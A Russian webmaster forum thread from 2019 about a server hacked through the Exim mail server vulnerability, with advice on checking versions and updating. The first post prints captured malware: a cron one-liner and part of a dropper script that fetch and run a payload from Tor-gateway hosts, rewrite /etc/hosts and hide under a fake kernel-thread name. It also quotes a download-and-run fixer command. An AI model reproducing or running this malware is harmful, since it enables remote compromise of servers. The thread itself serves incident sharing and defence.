Уязвимость очень высокого уровня в exim
Страницы: 1
Уязвимость очень высокого уровня в exim, Проверяем свои сервера и устанавливаем обновление срочно!
10 июня примерно в 2.52 по мск один мой сервер был взломан данным способом скрин 1 [url]https://prnt.sc/nzqmhf[/url] скрин 2 [url]https://prnt.sc/nzq1ta[/url]
Заметил, что сайт упал 502 ошибкой начал смотреть заметил потухшие службы (скрин 2) в процессах висело такое

Код
[CODE]  PID USER      PR  NI    VIRT    RES    SHR S  %CPU %MEM     TIME+ COMMAND
10543 root      20   0  430524   7636    652 S 399.3  0.0 256:26.18 [kthrotlds]
   42 root      rt   0       0      0      0 S   0.3  0.0   0:00.01 watchdog/7
29601 mysql     20   0 2281312 274392   5496 S   0.3  0.4   0:00.28 mysqld
в кроне такой код был

Код
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi;  (${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -o /usr/local/bin/npt||${curl}  -fsSLk --connect-timeout 26 --max-time 75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -o /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.su/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.tor2web.io/src/ldm -O /usr/local/bin/npt||${wget}  --quiet --no-check-certificate --connect-timeout=26 --timeout=75  https://an7kmd2wp4xo7hpr.onion.sh/src/ldm -O /usr/local/bin/npt) && chmod +x /usr/local/bin/npt && /bin/sh /usr/local/bin/npt

В данный момент собираю новый сервер на старом пока сайт висит с обрубленным кроном, что именно успели сделать пока выясняю и не лечил

Код
wget http://lechillka.firstvds.ru/exim_rce_fixer.sh && chmod +x exim_rce_fixer.sh && ./exim_rce_fixer.sh
 и не уверен что всё вылечит решил новый сервер собрать.

В созданных файлах можно найти такой код 

Код
#!/bin/bash

SPOOLDIR=/var/spool/exim

cd $SPOOLDIR/db
for a in retry misc wait-* callout ratelimit; do
    [ -r "$a" ] || continue
    [ "${a%%.lockfile}" = "$a" ] || continue
    /usr/sbin/exim_tidydb $SPOOLDIR $a >/dev/null
done
или такой

Код
#!/bin/sh
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
RHOST="https://an7kmd2wp4xo7hpr"
TOR1=".tor2web.su/"
TOR2=".tor2web.io/"
TOR3=".onion.sh/"
RPATH1='src/ldm'
#LPATH="${HOME-/tmp}/.cache/"
TIMEOUT="75"
CTIMEOUT="22"
COPTS=" -fsSLk --retry 2 --connect-timeout ${CTIMEOUT} --max-time ${TIMEOUT} "
WOPTS=" --quiet --tries=2 --wait=5 --no-check-certificate --connect-timeout=${CTIMEOUT} --timeout=${TIMEOUT} "
tbin=$(command -v passwd); bpath=$(dirname "${tbin}"
curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi
wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q ".wgetrc'-style command" && wget="$f" && break; done; fi; fi
#CHKCURL='curl="curl "; wget="wget "; if [ "$(whoami)" = "root" ]; then if [ $(command -v curl|wc -l) -eq 0 ]; then curl=$(ls /usr/bin|grep -i url|head -n 1); fi; if [ -z ${curl} ]; then curl="echo "; fi; if [ $(command -v wget|wc -l) -eq 0 ]; then wget=$(ls /usr/bin|grep -i wget|head -n 1); fi; if [ -z ${wget} ]; then wget="echo "; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; fi; '
CHKCURL='tbin=$(command -v passwd); bpath=$(dirname "${tbin}"; curl="curl"; if [ $(curl --version 2>/dev/null|grep "curl "|wc -l) -eq 0 ]; then curl="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "CURLOPT_VERBOSE" && curl="$f" && break; done; fi; fi; wget="wget"; if [ $(wget --version 2>/dev/null|grep "wgetrc "|wc -l) -eq 0 ]; then wget="echo"; if [ "${bpath}" != "" ]; then for f in ${bpath}*; do strings $f 2>/dev/null|grep -q "to <bug-wget@gnu.org>" && wget="$f" && break; done; fi; fi; if [ $(cat /etc/hosts|grep -i ".onion."|wc -l) -ne 0 ]; then echo "127.0.0.1 localhost" > /etc/hosts >/dev/null 2>&1; fi; '
LBIN8="kthrotlds"
null=' >/dev/null 2>&1'
sudoer=1
sudo=''
if [ "$(whoami)" != "root" ]; then
    sudo="sudo "
    timeout 1 sudo echo 'kthreadd' 2>/dev/null && sudoer=1||{ sudo=''; sudoer=0; }
.................Не помещается ))...............

Может кому пригодится.
Подробно описано здесь https://firstvds.ru/blog/uyazvimost-v-pochtovom-servere-exim
Рекомендую хостинг beget.com
Рекомендую хостинг в Европе от 70р.
Промокод 1EED-7963-D606-E8F4 -5% при заказе домена или хостинга на reg.ru

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Цитата
андрей ирмишин пишет:
Тоже вчера от хостера письмо получил по этому поводу. Как вы думаете отключение этой службы решит проблему или обязательно обновляться?
Я думаю лучше обновиться, или вообще удалить с сервера если не пользуетесь.
Сначала проверьте свою версию Exim:

Debian/Ubuntu:
dpkg --list |grep exim 
CentOS:
rpm -qa |grep exim
У многих до сих пор версия 4,86, которую обновлять не обязательно пока. Да и значит вас проблема не коснулась. Проблема у: 4.87 до 4.91.
Изменено: Александр - 13 Июня 2019 15:11
Спасибо за подсказку, у меня похожая проблема. Но пофиксил через Exim
Цитата
Qweniome Qweniome пишет:
Спасибо за подсказку, у меня похожая проблема. Но пофиксил через Exim
Спасибо, тоже через Exim починил.
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
11:36 Kokos.click - народная тизерная сеть! 
09:55 Супер-партнерка PayV: избранные офферы в топовых нишах 
07:32 Сайт никак не двигается, нету даже в ТОПе100-200 
00:54 AviTool - мощный инструмент для автоматизации работы с Avito 
21:10 CPA-PRIVATE.BIZ - премиальная товарная программа. Только ТОП ставки! 
20:57 Нужен движок форума. 
20:52 Gambling Craft - гемблинг по белому 
13:28 BestChange – обменивать электронную валюту можно быстро и выгодно 
12:09 Obama.ru - безопасный обмен криптовалют и электронных денежных средств 
12:06 Оцените интернет магазин (секс шоп) 
11:59 DengiShop.com - Моментальный обмен криптовалют! 
10:15 [eBucks] Автоматический обмен криптовалют. BTC и любые альткоины. Киви, Банковские карты и др. электронные системы. 
07:40 ESSOMILLANNI.COM - SOLID INVESTMENTS 2X 
19:11 Oborot.net - обмен валют онлайн 
11:31 Заблокировать посетителя через .htaccess 
08:49 37 противникам прививок от COVID грозят уголовные дела 
02:45 Вздремни со мной за деньги 
02:37 Двойные стандарты 
21:34 С юмором по жизни! 
21:07 Россияне рассказали, где собираются встретить Новый год 
20:57 Какой фильм вы любите посмотреть перед сном?